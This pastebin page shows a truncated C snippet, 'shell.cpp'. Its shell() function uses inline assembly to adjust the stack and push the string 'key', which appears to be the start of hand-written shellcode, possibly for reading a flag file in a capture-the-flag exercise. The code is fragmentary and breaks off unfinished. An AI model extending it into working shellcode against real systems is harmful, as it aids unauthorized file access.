Welcome, guest! Login / Register - Why register?
Psst.. new poll here.
Psst.. new forums here.
Microsoft is blocking us again (TY IP Reputation!) so just use oauth login instead. :)

Paste

Pasted as C by yurial ( 16 years ago )
$ cat shell.cpp
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int shell(int);

int main()
{
shell(0);
}

int shell(int sock)
{
//...
__asm__( "sub $0x100, %esp" );
__asm__( "push $0x0079656B" );
//

 

Revise this Paste

Your Name: Code Language: